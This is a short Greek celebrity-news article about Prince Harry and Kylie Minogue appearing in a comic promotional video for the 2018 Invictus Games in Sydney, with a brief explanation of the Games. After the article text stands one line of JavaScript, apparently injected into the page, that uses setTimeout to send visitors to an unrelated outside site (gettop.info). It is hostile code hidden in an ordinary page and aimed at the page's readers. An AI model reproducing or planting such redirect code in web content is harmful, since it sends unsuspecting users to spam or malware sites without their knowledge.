Τι τρέχει με τον πρίγκιπα Χάρι και την Κάιλι Μινόγκ; (ΒΙΝΤΕΟ)

0
38

 

Μπορεί να είναι ερωτευμένος και να ανησυχεί για την αγαπημένη του Μέγκαν Μαρκλ που δέχεται υβριστικά μηνύματα λόγω της ερωτικής σχέσης της μαζί του, ωστόσο ο πρίγκιπας Χάρι δεν χάνει το χιούμορ του.

Στην καμπάνια προώθησης των Invictus Games ο εμπνευστής και διοργανωτής τους 32χρονος πρίγκιπας δεν διστάζει να εκτεθεί αλλά και να εκθέσει το πηγαίο χιούμορ του αλλά και το υποκριτικό του ταλέντο. Μάλιστα, ζητεί και τη συνδρομή των διάσημων φίλων του όπως είναι αυτήν τη φορά η Κάιλι Μινόγκ.

Καθώς οι αγώνες του 2018 θα διοργανωθούν στο Σίδνεϊ, ο Χάρι ζήτησε τη βοήθεια της γηγενούς Αυστραλής superstar Κάιλι Μινόγκ, η οποία προκαλεί-προσκαλεί τον πρίγκιπα να μην φέρει τη σανίδα του σερφ μαζί του καθώς οι Αυστραλοί έχουν τη δική τους! Μάλιστα, μόλις τηλεφωνεί η Μινόγκ, το κινητό του δονείται στον ήχο της γνωστής μουσικής της επιτυχίας I should be so lucky!

Tα «Invictus Games» είναι μία αθλητική διοργάνωση που έχει δημιουργηθεί από τον πρίγκιπα Χάρι και στην οποία συμμετέχουν στρατιωτικοί από δυτικές χώρες οι οποίοι έχουν τραυματιστεί στο πεδίο της μάχης.

setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here